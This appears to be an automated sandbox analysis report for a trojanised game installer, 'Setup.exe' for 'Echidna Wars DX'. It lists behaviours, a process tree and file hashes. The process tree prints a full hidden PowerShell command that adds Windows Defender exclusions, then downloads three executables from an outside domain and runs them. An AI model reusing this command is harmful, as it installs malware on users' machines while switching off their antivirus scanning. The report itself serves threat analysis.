Analysis
max time kernel: 64s
max time network: 77s
platform: windows10-1703_x64
resource: win10-20240221-en
resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
submitted: 22/02/2024, 20:18

Static task: static1
Behavioral task: behavioral1
Sample: Setup.exe
Resource: win10-20240221-en
General
Target: Setup.exe
Size: 43.4MB
MD5: 308090e687a5e248d6aa4a65a5db85a6
SHA1: ef668821cca3ed41f1212a35ce51b942f4805850
SHA256: 0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
SHA512: 7bb70fb7c8cd6a136d3870f4797a65bd67c37cf25eabd413971beda0af2e6721a0d5893ce05de67d5a5f720785ddac36c78a80dc8b38fef486963b74937edb3b
SSDEEP: 786432:FAjeV1AyC0U9MLgeO3lPsagQYUQ4xo8vo4mMnmOZUQA2dhfTKBGG+U8ON9wB:w0kp9K7O3lPBgQHjPn1UsdBTKX+U8ONE
Malware Config
Signatures

Executes dropped EXE (2 IoCs)
  pid   Process
  4100  Setup.tmp
  4500  Game.exe

Loads dropped DLL (6 IoCs)
  pid   Process
  4500  Game.exe  (6 entries, all from this process)

Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
  pid   pid_target  Process       procid_target
  2844  4500        WerFault.exe  81

Runs net.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid   Process
  4100  Setup.tmp       (2 entries)
  4600  powershell.exe  (3 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description                        pid   Process
  Token: SeDebugPrivilege            4600  powershell.exe
  Token: 33                          2840  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  2840  AUDIODG.EXE

Suspicious use of FindShellTrayWindow (1 IoCs)
  pid   Process
  4100  Setup.tmp

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  4500  Game.exe  (2 entries)

Suspicious use of WriteProcessMemory (15 IoCs)
  description                        pid   Process    procid_target
  PID 3992 wrote to memory of 4100   3992  Setup.exe  74   (3 entries)
  PID 4100 wrote to memory of 4568   4100  Setup.tmp  75   (3 entries)
  PID 4568 wrote to memory of 656    4568  cmd.exe    77   (3 entries)
  PID 656 wrote to memory of 4456    656   net.exe    78   (3 entries)
  PID 4568 wrote to memory of 4600   4568  cmd.exe    80   (3 entries)
Processes

C:\Users\Admin\AppData\Local\Temp\Setup.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  PID: 3992
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    PID: 4100
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""
      PID: 4568
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net.exe
        Command line: net session
        PID: 656
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 session
          PID: 4456
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit
        PID: 4600
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

C:\Echidna Wars DX\Game.exe
  Command line: "C:\Echidna Wars DX\Game.exe"
  PID: 4500
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772
    PID: 2844
    - Program crash

C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x2f4
  PID: 2840
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 6.9MB
MD5: 7de3741fb79dcfa8df54a4daa90c8692
SHA1: 8003f910997a50719d55ff098f42a23d13598b08
SHA256: 86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b
SHA512: 31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c

Filesize: 8.7MB
MD5: 4e26e69b1622efa982a86cbe2edd5801
SHA1: 8d75b18942f4ab79e29457d12d47cb7bb8763612
SHA256: 4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472
SHA512: 2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7

Filesize: 28.3MB
MD5: 5769be658b2478d3d437c152adec05cf
SHA1: 9794744bd45a038641f219ecefd31fa2e239ebbd
SHA256: 4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e
SHA512: 8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e

Filesize: 559B
MD5: 62f9201f9ed75ebef04946bcdf72d95a
SHA1: 5779fad609e0c77363e6436230954243c29c9205
SHA256: f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847
SHA512: ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806

Filesize: 57KB
MD5: 88735cdf603d77cceef556215e43a45f
SHA1: 47a4d364015a3f17143978b32aeb35220c54cb0a
SHA256: 0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212
SHA512: 06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71

Filesize: 131KB
MD5: def47290ed52d7ce0a2e65e8ffac95a2
SHA1: 0edc4bb840d995a5d80f1cd15026e655c817a6ce
SHA256: 558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc
SHA512: 469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208

Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 3.0MB
MD5: 9665ccc8017eab35c9bea56ab727692a
SHA1: 177a4d25e994e3a5e792360ce1ef48a25c9600e3
SHA256: dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c
SHA512: df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5

Filesize: 608KB
MD5: 401a237f4e02457713382b2413a4800c
SHA1: fcddfc03d93011efb0e0910c456aa47f2e632057
SHA256: 5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565
SHA512: 443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61

Filesize: 236KB
MD5: 8c44de023765b683fce13c7d17a00add
SHA1: b5256452df6f534057271a8cd1df817ce3a5bbe7
SHA256: 02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8
SHA512: ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2